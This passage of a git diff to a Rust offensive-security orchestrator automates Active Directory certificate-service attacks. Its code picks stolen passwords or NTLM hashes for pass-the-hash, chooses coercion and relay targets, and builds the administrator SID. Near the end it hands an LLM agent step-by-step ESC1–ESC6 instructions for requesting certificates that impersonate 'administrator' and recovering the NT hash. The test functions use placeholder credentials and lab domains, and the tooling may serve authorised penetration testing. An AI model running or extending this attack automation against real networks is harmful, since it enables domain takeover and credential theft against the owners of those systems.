.iter() + .find(|known| known.to_lowercase().ends_with(&format!(".{d}"))) + }) + .cloned() + .or(Some(d)) + } + }) + .or_else(|| state.domains.first().cloned())?; + + // Skip domains we already own — DA on a domain means we don't + // need to escalate via its CA. (We may still need ADCS against an + // un-owned domain via cross-trust, so this is per-domain not global.)
+ if state.dominated_domains.contains(&domain) { + return None; + } + + // Look up DC IP for this domain (certipy needs LDAP on a DC, not the CA host). + // Uses resolve_dc_ip() which falls back to scanning hosts list when + // domain_controllers doesn't have an entry. + let dc_ip = state.resolve_dc_ip(&domain); + + // certipy_find authenticates via LDAP bind to the target DC. + // NTLM/Kerberos bind succeeds within the same forest (same domain or + // parent/child/sibling) but fails 52e across a forest trust because + // the source principal does not exist in the target's domain and + // impacket cannot follow Kerberos cross-realm referrals. + // + // Restrict cred selection to the same forest as the target. If no + // same-forest cred exists, skip dispatch — other automations + // (foreign_group_enum, mssql_linked_server, golden_cert) handle + // the cross-forest foothold path that yields a same-forest cred. + // + // The dedup key includes the candidate credential's identity, so a + // failed first attempt with one cred does not block a later, possibly + // correct cred against the same CA host. 
+ let domain_lower = domain.to_lowercase(); + let target_forest = state.forest_root_of(&domain_lower); + let cred = { + let mut candidates: Vec<&ares_core::models::Credential> = state + .credentials + .iter() + .filter(|c| { + !c.password.is_empty() + && c.domain.to_lowercase() == domain_lower + && !state.is_delegation_account(&c.username) + && !state.is_credential_quarantined(&c.username, &c.domain) + }) + .collect(); + candidates.extend(state.credentials.iter().filter(|c| { + let cd = c.domain.to_lowercase(); + !c.password.is_empty() + && cd != domain_lower + && state.forest_root_of(&cd) == target_forest + && !state.is_delegation_account(&c.username) + && !state.is_credential_quarantined(&c.username, &c.domain) + })); + candidates + .into_iter() + .find(|c| !state.is_processed(DEDUP_ADCS_SERVERS, &dedup_key_cred(&s.host, c))) + .cloned() + }; + + // Look for NTLM hash (PTH) only if cred path is exhausted (no + // unprocessed cred candidate exists). Same identity-aware dedup. + let hash_pick = if cred.is_none() { + let pred_admin_same = |h: &&ares_core::models::Hash| { + h.hash_type.eq_ignore_ascii_case("ntlm") + && (h.domain.to_lowercase() == domain_lower || h.domain.is_empty()) + && h.username.to_lowercase() == "administrator" + }; + let pred_any_same = |h: &&ares_core::models::Hash| { + h.hash_type.eq_ignore_ascii_case("ntlm") + && (h.domain.to_lowercase() == domain_lower || h.domain.is_empty()) + && !state.is_delegation_account(&h.username) + }; + let same_forest = |h: &&ares_core::models::Hash| -> bool { + let hd = h.domain.to_lowercase(); + !hd.is_empty() && state.forest_root_of(&hd) == target_forest + }; + let pred_admin_xdom = |h: &&ares_core::models::Hash| { + h.hash_type.eq_ignore_ascii_case("ntlm") + && same_forest(h) + && h.username.to_lowercase() == "administrator" + }; + let pred_any_xdom = |h: &&ares_core::models::Hash| { + h.hash_type.eq_ignore_ascii_case("ntlm") + && same_forest(h) + && !state.is_delegation_account(&h.username) + }; + + let mut 
candidates: Vec<&ares_core::models::Hash> = Vec::new(); + candidates.extend(state.hashes.iter().filter(pred_admin_same)); + candidates.extend(state.hashes.iter().filter(pred_any_same).filter(|h| { + h.username.to_lowercase() != "administrator" + || (h.domain.to_lowercase() != domain_lower && !h.domain.is_empty()) + })); + candidates.extend( + state.hashes.iter().filter(pred_admin_xdom).filter(|h| { + h.domain.to_lowercase() != domain_lower && !h.domain.is_empty() + }), + ); + candidates.extend( + state + .hashes + .iter() + .filter(pred_any_xdom) + .filter(|h| h.username.to_lowercase() != "administrator"), + ); + candidates + .into_iter() + .find(|h| !state.is_processed(DEDUP_ADCS_SERVERS, &dedup_key_hash(&s.host, h))) + .cloned() + } else { + None + }; + let (ntlm_hash, ntlm_hash_username) = match &hash_pick { + Some(h) => (Some(h.hash_value.clone()), Some(h.username.clone())), + None => (None, None), + }; + + // Need at least a credential or an NTLM hash + if cred.is_none() && ntlm_hash.is_none() { + return None; + } + + let dedup_key = match (&cred, &hash_pick) { + (Some(c), _) => dedup_key_cred(&s.host, c), + (None, Some(h)) => dedup_key_hash(&s.host, h), + (None, None) => return None, + }; + + Some(AdcsWork { + host_ip: s.host.clone(), + dedup_key, + dc_ip, + domain: domain.clone(), + credential: cred.unwrap_or_else(|| ares_core::models::Credential { + id: String::new(), + username: ntlm_hash_username.clone().unwrap_or_default(), + password: String::new(), + domain, + source: "hash_fallback".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }), + ntlm_hash, + ntlm_hash_username, + }) + }) + .collect() +} + /// Detects ADCS servers by looking for CertEnroll shares and dispatches certipy_find. /// Interval: 30s. Matches Python `_auto_adcs_enumeration`. 
pub async fn auto_adcs_enumeration( @@ -35,78 +259,70 @@ pub async fn auto_adcs_enumeration( break; } - // Find CertEnroll shares on unprocessed hosts + get a credential - let work: Vec<(String, String, ares_core::models::Credential)> = { + let work = { let state = dispatcher.state.read().await; - let cred = match state - .credentials - .iter() - .find(|c| { - !state.is_delegation_account(&c.username) - && !state.is_credential_quarantined(&c.username, &c.domain) - }) - .or_else(|| state.credentials.first()) - { - Some(c) => c.clone(), - None => continue, - }; - state + let creds = state.credentials.len(); + let hashes = state.hashes.len(); + let certenroll_shares: Vec<_> = state .shares .iter() .filter(|s| s.name.to_lowercase() == "certenroll") - .filter(|s| !state.is_processed(DEDUP_ADCS_SERVERS, &s.host)) - .filter_map(|s| { - // Resolve the domain for this ADCS host by matching the - // host's FQDN against known domains, or finding which DC - // subnet the host belongs to. Falls back to first domain. - let host_lower = s.host.to_lowercase(); - let domain = state - .hosts - .iter() - .find(|h| h.ip == s.host || h.hostname.to_lowercase() == host_lower) - .and_then(|h| extract_domain_from_fqdn(&h.hostname)) - .and_then(|d| { - // Verify it's a known domain - if state.domains.iter().any(|known| known.to_lowercase() == d) { - Some(d) - } else { - // Try parent match (e.g. 
child.contoso.local → contoso.local) - state - .domains - .iter() - .find(|known| { - d.ends_with(&format!(".{}", known.to_lowercase())) - }) - .or_else(|| { - state.domains.iter().find(|known| { - known.to_lowercase().ends_with(&format!(".{d}")) - }) - }) - .cloned() - .or(Some(d)) - } - }) - .or_else(|| state.domains.first().cloned())?; - Some((s.host.clone(), domain, cred.clone())) - }) - .collect() + .collect(); + let ce_count = certenroll_shares.len(); + let ce_hosts: Vec<_> = certenroll_shares.iter().map(|s| s.host.as_str()).collect(); + let cred_domains: Vec<_> = state + .credentials + .iter() + .map(|c| c.domain.as_str()) + .collect(); + let hash_domains: Vec<_> = state.hashes.iter().map(|h| h.domain.as_str()).collect(); + let domains: Vec<_> = state.domains.iter().map(|d| d.as_str()).collect(); + let w = collect_adcs_work(&state); + info!( + creds, + hashes, + certenroll_shares = ce_count, + ?ce_hosts, + ?cred_domains, + ?hash_domains, + ?domains, + work_items = w.len(), + "auto_adcs_enumeration: tick" + ); + w }; - for (host_ip, domain, cred) in work { + for item in work { + // Use DC IP for certipy LDAP queries; fall back to CA host IP + let target_ip = item.dc_ip.as_deref().unwrap_or(&item.host_ip); + // Pass CA host IP separately so the parser sets the correct vuln target + // (the CA server, not the DC used for LDAP). 
+ let ca_host_ip = if item.dc_ip.is_some() { + Some(item.host_ip.as_str()) + } else { + None + }; match dispatcher - .request_certipy_find(&host_ip, &domain, &cred) + .request_certipy_find( + target_ip, + &item.domain, + &item.credential, + item.ntlm_hash.as_deref(), + item.ntlm_hash_username.as_deref(), + ca_host_ip, + ) .await { Ok(Some(task_id)) => { - info!(task_id = %task_id, host = %host_ip, "ADCS enumeration dispatched"); + info!(task_id = %task_id, host = %item.host_ip, dc_ip = ?item.dc_ip, "ADCS enumeration dispatched"); dispatcher .state .write() .await - .mark_processed(DEDUP_ADCS_SERVERS, host_ip.clone()); + .mark_processed(DEDUP_ADCS_SERVERS, item.dedup_key.clone()); let _ = dispatcher .state - .persist_dedup(&dispatcher.queue, DEDUP_ADCS_SERVERS, &host_ip) + .persist_dedup(&dispatcher.queue, DEDUP_ADCS_SERVERS, &item.dedup_key) .await; } Ok(None) => {} @@ -119,6 +335,259 @@ pub async fn auto_adcs_enumeration( #[cfg(test)] mod tests { use super::*; + use ares_core::models::{Credential, Host, Share}; + + fn make_credential(username: &str, password: &str, domain: &str) -> Credential { + Credential { + id: format!("c-{username}"), + username: username.into(), + password: password.into(), // pragma: allowlist secret + domain: domain.into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + } + } + + fn make_host(ip: &str, hostname: &str, is_dc: bool) -> Host { + Host { + ip: ip.into(), + hostname: hostname.into(), + os: String::new(), + roles: Vec::new(), + services: Vec::new(), + is_dc, + owned: false, + } + } + + fn make_share(host: &str, name: &str) -> Share { + Share { + host: host.into(), + name: name.into(), + permissions: String::new(), + comment: String::new(), + } + } + + // --- collect_adcs_work tests --- + + #[test] + fn collect_empty_state_returns_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_adcs_work(&state); + assert!(work.is_empty()); + } + + #[test] 
+ fn collect_no_credentials_returns_no_work() { + let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "CertEnroll")); + let work = collect_adcs_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_certenroll_share_produces_work() { + let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "CertEnroll")); + state + .hosts + .push(make_host("192.168.58.50", "ca01.contoso.local", false)); + state.domains.push("contoso.local".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_adcs_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].host_ip, "192.168.58.50"); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].credential.username, "admin"); + } + + #[test] + fn collect_dedup_skips_already_processed() { + let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "CertEnroll")); + state + .hosts + .push(make_host("192.168.58.50", "ca01.contoso.local", false)); + state.domains.push("contoso.local".into()); + let cred = make_credential("admin", "P@ssw0rd!", "contoso.local"); // pragma: allowlist secret + state.credentials.push(cred.clone()); + // Mark the identity-aware dedup key for the only candidate cred. 
+ state.mark_processed(DEDUP_ADCS_SERVERS, dedup_key_cred("192.168.58.50", &cred)); + let work = collect_adcs_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_non_certenroll_share_ignored() { + let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "SYSVOL")); + state + .hosts + .push(make_host("192.168.58.50", "dc01.contoso.local", true)); + state.domains.push("contoso.local".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_adcs_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_prefers_same_domain_credential() { + let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "CertEnroll")); + state + .hosts + .push(make_host("192.168.58.50", "ca01.fabrikam.local", false)); + state.domains.push("fabrikam.local".into()); + state + .credentials + .push(make_credential("crossuser", "Cross!1", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("fabadmin", "Fab!Pass1", "fabrikam.local")); // pragma: allowlist secret + let work = collect_adcs_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "fabadmin"); + } + + #[test] + fn collect_falls_back_to_first_domain_when_no_host_match() { + let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "CertEnroll")); + // No matching host in state.hosts + state.domains.push("contoso.local".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_adcs_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + } + + #[test] + fn collect_certenroll_case_insensitive() { + let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", 
"certenroll")); + state.domains.push("contoso.local".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_adcs_work(&state); + assert_eq!(work.len(), 1); + } + + #[test] + fn collect_multiple_adcs_hosts() { + let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "CertEnroll")); + state.shares.push(make_share("192.168.58.51", "CertEnroll")); + state + .hosts + .push(make_host("192.168.58.50", "ca01.contoso.local", false)); + state + .hosts + .push(make_host("192.168.58.51", "ca02.fabrikam.local", false)); + state.domains.push("contoso.local".into()); + state.domains.push("fabrikam.local".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("fabadmin", "Fab!Pass1", "fabrikam.local")); // pragma: allowlist secret + let work = collect_adcs_work(&state); + assert_eq!(work.len(), 2); + } + + #[test] + fn collect_skips_cross_forest_cred_for_ca_host() { + // contoso.local CA, only fabrikam.local cred (different forest). + // certipy_find LDAP bind across forest trust fails 52e — skip dispatch. + let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "CertEnroll")); + state + .hosts + .push(make_host("192.168.58.50", "ca01.contoso.local", false)); + state.domains.push("contoso.local".into()); + state.domains.push("fabrikam.local".into()); + state + .credentials + .push(make_credential("foreigner", "P@ss!", "fabrikam.local")); // pragma: allowlist secret + let work = collect_adcs_work(&state); + assert!( + work.is_empty(), + "should not dispatch ADCS enum with cross-forest cred" + ); + } + + #[test] + fn collect_uses_child_domain_cred_for_parent_ca() { + // child cred → parent CA: same forest, LDAP bind succeeds. 
+ let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "CertEnroll")); + state + .hosts + .push(make_host("192.168.58.50", "ca01.contoso.local", false)); + state.domains.push("contoso.local".into()); + state.domains.push("dev.contoso.local".into()); + state + .credentials + .push(make_credential("childuser", "P@ss!", "dev.contoso.local")); // pragma: allowlist secret + let work = collect_adcs_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "childuser"); + } + + #[test] + fn collect_quarantined_same_domain_does_not_fall_back_cross_forest() { + let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "CertEnroll")); + state + .hosts + .push(make_host("192.168.58.50", "ca01.contoso.local", false)); + state.domains.push("contoso.local".into()); + state.domains.push("fabrikam.local".into()); + state + .credentials + .push(make_credential("baduser", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("gooduser", "Pass!456", "fabrikam.local")); // pragma: allowlist secret + state.quarantine_credential("baduser", "contoso.local"); + let work = collect_adcs_work(&state); + assert!( + work.is_empty(), + "cross-forest LDAP bind fails 52e — must not dispatch with fabrikam cred" + ); + } + + #[test] + fn collect_quarantined_same_domain_falls_back_to_sibling_in_same_forest() { + let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "CertEnroll")); + state + .hosts + .push(make_host("192.168.58.50", "ca01.contoso.local", false)); + state.domains.push("contoso.local".into()); + state.domains.push("dev.contoso.local".into()); + state + .credentials + .push(make_credential("baduser", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("gooduser", "Pass!456", "dev.contoso.local")); // pragma: allowlist secret 
+ state.quarantine_credential("baduser", "contoso.local"); + let work = collect_adcs_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "gooduser"); + } #[test] fn extract_domain_from_fqdn_typical() { @@ -159,4 +628,70 @@ mod tests { // "host." splits into ("host", "") -> Some("") assert_eq!(extract_domain_from_fqdn("host."), Some("".to_string())); } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_ADCS_SERVERS, "adcs_servers"); + } + + #[test] + fn certenroll_share_name_match() { + let share_name = "CertEnroll"; + assert_eq!(share_name.to_lowercase(), "certenroll"); + } + + #[test] + fn certenroll_case_insensitive() { + let names = vec!["CertEnroll", "certenroll", "CERTENROLL"]; + for name in names { + assert_eq!(name.to_lowercase(), "certenroll"); + } + } + + #[test] + fn domain_resolution_from_fqdn() { + // Verifies domain extraction works for typical ADCS hosts + assert_eq!( + extract_domain_from_fqdn("ca01.contoso.local"), + Some("contoso.local".to_string()) + ); + assert_eq!( + extract_domain_from_fqdn("ca01.fabrikam.local"), + Some("fabrikam.local".to_string()) + ); + } + + #[test] + fn credential_selection_prefers_same_domain() { + let creds = [ + ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }, + ares_core::models::Credential { + id: "c2".into(), + username: "admin2".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "fabrikam.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }, + ]; + let target_domain = "fabrikam.local"; + let selected = creds.iter().find(|c| { + !c.password.is_empty() && c.domain.to_lowercase() == target_domain.to_lowercase() + }); + assert!(selected.is_some()); + 
assert_eq!(selected.unwrap().domain, "fabrikam.local"); + } } diff --git a/ares-cli/src/orchestrator/automation/adcs_exploitation.rs b/ares-cli/src/orchestrator/automation/adcs_exploitation.rs index 124c9c2f..e65cbb07 100644 --- a/ares-cli/src/orchestrator/automation/adcs_exploitation.rs +++ b/ares-cli/src/orchestrator/automation/adcs_exploitation.rs @@ -23,22 +23,48 @@ use crate::orchestrator::dispatcher::Dispatcher; const DEDUP_ADCS_EXPLOIT: &str = "adcs_exploit"; /// ADCS vulnerability types we know how to exploit. -const EXPLOITABLE_ESC_TYPES: &[&str] = &[ +/// ESC1/2/3/6: certipy req (enrollment-based, certipy_request tool) +/// ESC4: certipy template modification (certipy_template_esc4 / certipy_esc4_full_chain) +/// ESC7: ManageCA abuse (certipy_esc7_full_chain: add-officer → SubCA → issue → retrieve → auth) +/// ESC8: NTLM relay to HTTP web enrollment (coercion role) +/// ESC9/13: certipy req with specific flags +/// ESC10: Weak certificate mapping (StrongCertificateBindingEnforcement=0), certipy req -sid +/// ESC11: RPC relay to ICPR enrollment (certipy relay -target rpc://, coercion role) +/// ESC15: Application policy OID abuse (certipy req -application-policies) +pub(crate) const EXPLOITABLE_ESC_TYPES: &[&str] = &[ "esc1", + "esc2", + "esc3", "esc4", + "esc6", + "esc7", "esc8", + "esc9", + "esc10", + "esc11", + "esc13", + "esc15", "adcs_esc1", + "adcs_esc2", + "adcs_esc3", "adcs_esc4", + "adcs_esc6", + "adcs_esc7", "adcs_esc8", + "adcs_esc9", + "adcs_esc10", + "adcs_esc11", + "adcs_esc13", + "adcs_esc15", ]; /// Monitors for discovered ADCS vulnerabilities and dispatches exploitation tasks. -/// Interval: 30s. +/// Interval: 5s. 
 pub async fn auto_adcs_exploitation(
     dispatcher: Arc<Dispatcher>,
     mut shutdown: watch::Receiver<bool>,
 ) {
-    let mut interval = tokio::time::interval(Duration::from_secs(30));
+    let mut interval = tokio::time::interval(Duration::from_secs(5));
     interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
 
     loop {
@@ -104,44 +130,63 @@ pub async fn auto_adcs_exploitation(
                         .unwrap_or("")
                         .to_string();
 
-                    let ca_host = extract_ca_host(&vuln.details, &vuln.target);
+                    let ca_host = extract_ca_host(&vuln.details, &vuln.target).or_else(|| {
+                        // When the parser couldn't determine the CA host (empty target),
+                        // resolve it from the CertEnroll share for this domain.
+                        resolve_ca_host_from_shares(&state.shares, &state.hosts, &domain)
+                    });
 
                     // For ESC4, we need the account with GenericAll on the template
                     let account_name = extract_account_name(&vuln.details);
 
                     // Find a credential for exploitation.
-                    // For ESC4, prefer the account that has GenericAll on the template.
-                    // For ESC1/ESC8, any authenticated user in the domain works.
-                    let credential = account_name
+                    // For ESC4, prefer the account that has GenericAll on the
+                    // template (it may live in a different domain than the CA
+                    // — cross-forest ACL edge — so use the source-cred helper).
+                    // For ESC1/ESC8/etc, any authenticated user in the CA's
+                    // domain works; cross-forest ESC8 also accepts a credential
+                    // from a trusting domain because the relay path doesn't
+                    // need same-domain auth (the cert is issued to whatever
+                    // principal lands on the relay).
+ let account_cred = account_name .as_ref() - .and_then(|acct| { - state.credentials.iter().find(|c| { - c.username.to_lowercase() == acct.to_lowercase() - && (domain.is_empty() - || c.domain.to_lowercase() == domain.to_lowercase()) + .and_then(|acct| state.find_source_credential(acct, &domain)); + + let same_domain_cred = if !domain.is_empty() { + state + .credentials + .iter() + .find(|c| { + c.domain.to_lowercase() == domain.to_lowercase() + && !c.password.is_empty() + && !c.username.starts_with('$') + && !state.is_delegation_account(&c.username) + && !state.is_credential_quarantined(&c.username, &c.domain) }) - }) - .or_else(|| { - // Fall back to any credential for this domain - if !domain.is_empty() { - state.credentials.iter().find(|c| { - c.domain.to_lowercase() == domain.to_lowercase() - && !c.password.is_empty() - && !state.is_delegation_account(&c.username) - && !state.is_credential_quarantined(&c.username, &c.domain) - }) - } else { - state.credentials.iter().find(|c| { - !c.password.is_empty() - && !state.is_delegation_account(&c.username) - && !state.is_credential_quarantined(&c.username, &c.domain) - }) - } - }) - .cloned(); + .cloned() + } else { + state + .credentials + .iter() + .find(|c| { + !c.password.is_empty() + && !c.username.starts_with('$') + && !state.is_delegation_account(&c.username) + && !state.is_credential_quarantined(&c.username, &c.domain) + }) + .cloned() + }; + + let trust_cred = if same_domain_cred.is_none() && !domain.is_empty() { + state.find_trust_credential(&domain) + } else { + None + }; + + let credential = account_cred.or(same_domain_cred).or(trust_cred); if credential.is_none() { - debug!( + info!( vuln_id = %vuln.vuln_id, esc_type = %esc_type, "ADCS exploit skipped: no credential available" @@ -154,6 +199,22 @@ pub async fn auto_adcs_exploitation( .get(&domain.to_lowercase()) .cloned(); + let domain_sid = state.domain_sids.get(&domain.to_lowercase()).cloned(); + + // For coercion-based ESC paths (esc8/esc11), build a + 
// tier-ordered candidate list of coerce targets so the LLM + // agent can iterate when the first one's callback drifts. + let coerce_candidates = if matches!(esc_type.as_str(), "esc8" | "esc11") { + pick_coerce_targets( + ca_host.as_deref(), + dc_ip.as_deref(), + &state.domain_controllers, + &state.hosts, + ) + } else { + Vec::new() + }; + Some(AdcsExploitWork { vuln_id: vuln.vuln_id.clone(), dedup_key, @@ -163,13 +224,49 @@ pub async fn auto_adcs_exploitation( ca_host, domain, dc_ip, + domain_sid, credential, + coerce_candidates, }) }) .collect() }; for item in work { + let role = role_for_esc_type(&item.esc_type); + + // Coercion-based ESC paths (ESC8, ESC11) need a relay listener and + // a coerce target that is not the CA itself — Windows NTLM + // same-machine loopback protection blocks relay back to the + // coerced host. Without these, the dispatched task cannot succeed. + let (coerce_target, coerce_targets, listener_ip) = if role == "coercion" { + let listener = match dispatcher.config.listener_ip.as_deref() { + Some(ip) => ip.to_string(), + None => { + debug!( + vuln_id = %item.vuln_id, + esc_type = %item.esc_type, + "ADCS coercion exploit skipped: no listener_ip configured" + ); + continue; + } + }; + if item.coerce_candidates.is_empty() { + debug!( + vuln_id = %item.vuln_id, + esc_type = %item.esc_type, + ca_host = ?item.ca_host, + "ADCS coercion exploit skipped: no coerce target distinct from ca_host" + ); + continue; + } + let primary = item.coerce_candidates[0].clone(); + let all = item.coerce_candidates.clone(); + (Some(primary), Some(all), Some(listener)) + } else { + (None, None, None) + }; + let mut payload = json!({ "technique": format!("adcs_{}", item.esc_type), "vuln_type": format!("adcs_{}", item.esc_type), @@ -177,6 +274,7 @@ pub async fn auto_adcs_exploitation( "esc_type": item.esc_type, "domain": item.domain, "impersonate": "administrator", + "instructions": esc_instructions(&item.esc_type), }); if let Some(ref ca) = item.ca_name { @@ 
-192,6 +290,23 @@ pub async fn auto_adcs_exploitation( if let Some(ref dc) = item.dc_ip { payload["dc_ip"] = json!(dc); } + if let Some(ref sid) = item.domain_sid { + payload["domain_sid"] = json!(sid); + // Administrator RID is always 500 + payload["admin_sid"] = json!(format!("{sid}-500")); + } + + if let Some(ref ip) = listener_ip { + payload["listener_ip"] = json!(ip); + } + if let Some(ref t) = coerce_target { + payload["coerce_target"] = json!(t); + } + if let Some(ref ts) = coerce_targets { + if !ts.is_empty() { + payload["coerce_targets"] = json!(ts); + } + } if let Some(ref cred) = item.credential { payload["username"] = json!(cred.username); @@ -203,10 +318,6 @@ pub async fn auto_adcs_exploitation( }); } - // ESC8 uses coercion+relay, dispatch to coercion role. - // ESC1/ESC4 use certipy directly, dispatch to privesc role. - let role = role_for_esc_type(&item.esc_type); - let priority = dispatcher.effective_priority(&format!("adcs_{}", item.esc_type)); match dispatcher .throttled_submit("exploit", role, payload, priority) @@ -300,13 +411,190 @@ fn extract_account_name( .map(|s| s.to_string()) } +/// Resolve CA host IP from CertEnroll shares when the vuln has no target. +/// Looks for a CertEnroll share whose host belongs to the given domain. +/// Falls back to any CertEnroll share if no domain-matched share is found. 
+fn resolve_ca_host_from_shares(
+    shares: &[ares_core::models::Share],
+    hosts: &[ares_core::models::Host],
+    domain: &str,
+) -> Option<String> {
+    let certenroll_shares: Vec<_> = shares
+        .iter()
+        .filter(|s| s.name.to_lowercase() == "certenroll")
+        .collect();
+
+    if certenroll_shares.is_empty() {
+        return None;
+    }
+
+    // Try domain-matched share first
+    if !domain.is_empty() {
+        let domain_lower = domain.to_lowercase();
+        if let Some(s) = certenroll_shares.iter().find(|s| {
+            hosts.iter().any(|h| {
+                (h.ip == s.host || h.hostname.to_lowercase() == s.host.to_lowercase())
+                    && h.hostname.to_lowercase().ends_with(&domain_lower)
+            })
+        }) {
+            return Some(s.host.clone());
+        }
+    }
+
+    // Fall back to any CertEnroll share (likely the CA for this environment)
+    certenroll_shares.first().map(|s| s.host.clone())
+}
+
+/// Build a tier-ordered list of viable coerce targets for ESC8/ESC11,
+/// excluding the CA host (Windows NTLM same-machine loopback blocks relay
+/// back to the coerced host). Tiers: (1) the vuln-domain DC, (2) any other
+/// DCs in state, (3) Windows member servers in state. The agent iterates
+/// the list when an earlier candidate's callback drifts (a real lab
+/// failure mode — see `relay_and_coerce_validation.md`). Comparison against
+/// `ca_host` is case-insensitive.
+fn pick_coerce_targets(
+    ca_host: Option<&str>,
+    dc_ip: Option<&str>,
+    domain_controllers: &std::collections::HashMap<String, String>,
+    hosts: &[ares_core::models::Host],
+) -> Vec<String> {
+    let ca_lower = ca_host.map(str::to_lowercase);
+    let mut out: Vec<String> = Vec::new();
+    let push_unique = |out: &mut Vec<String>, candidate: &str| {
+        if candidate.is_empty() {
+            return;
+        }
+        let cand_lower = candidate.to_lowercase();
+        if ca_lower.as_deref() == Some(cand_lower.as_str()) {
+            return;
+        }
+        if !out.iter().any(|e| e.to_lowercase() == cand_lower) {
+            out.push(candidate.to_string());
+        }
+    };
+
+    // Tier 1: vuln-domain DC.
+    if let Some(dc) = dc_ip {
+        push_unique(&mut out, dc);
+    }
+    // Tier 2: other DCs in state (cross-domain coercion is fine for ESC8 —
+    // the CA accepts any authenticated machine account).
+    for ip in domain_controllers.values() {
+        push_unique(&mut out, ip);
+    }
+    // Tier 3: Windows member servers (bypass DC callback drift). We check
+    // both the OS string and SMB service exposure since `os` is not always
+    // populated.
+    for h in hosts {
+        if h.is_dc {
+            continue;
+        }
+        let is_windows = h.os.to_lowercase().contains("windows")
+            || h.services.iter().any(|s| {
+                let s = s.to_lowercase();
+                s.contains("microsoft-ds") || s.contains("netbios-ssn")
+            });
+        if is_windows {
+            push_unique(&mut out, &h.ip);
+        }
+    }
+
+    out
+}
+
 /// Determine the dispatch role for a given ESC type.
-/// ESC8 uses coercion+relay (coercion role), while ESC1/ESC4 use certipy directly (privesc role).
+/// ESC8 uses coercion+relay (coercion role), while all others use certipy directly (privesc role).
 fn role_for_esc_type(esc_type: &str) -> &'static str {
-    if esc_type == "esc8" {
-        "coercion"
-    } else {
-        "privesc"
+    match esc_type {
+        "esc8" | "esc11" => "coercion",
+        _ => "privesc",
+    }
+}
+
+/// Return ESC-type-specific exploitation instructions for the LLM agent.
+fn esc_instructions(esc_type: &str) -> &'static str {
+    match esc_type {
+        "esc1" => concat!(
+            "ESC1: Enrollee supplies Subject Alternative Name (SAN).\n",
+            "Use certipy_request with template, ca (CA name), upn='administrator@<domain>',\n",
+            "dc_ip (domain controller), target (CA server IP from ca_host field),\n",
+            "and sid (use admin_sid from payload, e.g. S-1-5-21-...-500).\n",
+            "IMPORTANT: The 'target' param MUST be the CA server (ca_host), NOT the DC.\n",
+            "IMPORTANT: Include 'sid' param (admin_sid) to avoid SID mismatch in certipy_auth.\n",
+            "Then use certipy_auth with the resulting .pfx to get the NT hash."
+        ),
+        "esc2" => concat!(
+            "ESC2: Any Purpose EKU allows client auth.\n",
+            "Use certipy_request with template, ca, dc_ip, target=ca_host, and sid=admin_sid.\n",
+            "IMPORTANT: Set target to the ca_host IP, not the dc_ip.\n",
+            "IMPORTANT: Include 'sid' param (admin_sid) to avoid SID mismatch in certipy_auth.\n",
+            "Then use certipy_auth with the resulting .pfx."
+        ),
+        "esc3" => concat!(
+            "ESC3: Certificate Request Agent (enrollment agent).\n",
+            "Step 1: certipy_request the CRA template with target=ca_host.\n",
+            "Step 2: Use that cert to request a cert on behalf of administrator.\n",
+            "IMPORTANT: Set target to the ca_host IP, not the dc_ip."
+        ),
+        "esc4" => concat!(
+            "ESC4: Template ACL abuse — attacker has GenericAll on a template.\n",
+            "Use certipy_esc4_full_chain which modifies the template to be ESC1-vulnerable,\n",
+            "requests a cert as administrator, then restores the original template.\n",
+            "IMPORTANT: Set target to the ca_host IP for certificate enrollment."
+        ),
+        "esc6" => concat!(
+            "ESC6: EDITF_ATTRIBUTESUBJECTALTNAME2 flag on the CA.\n",
+            "Use certipy_request with any template that allows client auth,\n",
+            "adding upn='administrator@<domain>', target=ca_host, and sid=admin_sid.\n",
+            "IMPORTANT: Set target to the ca_host IP, not the dc_ip.\n",
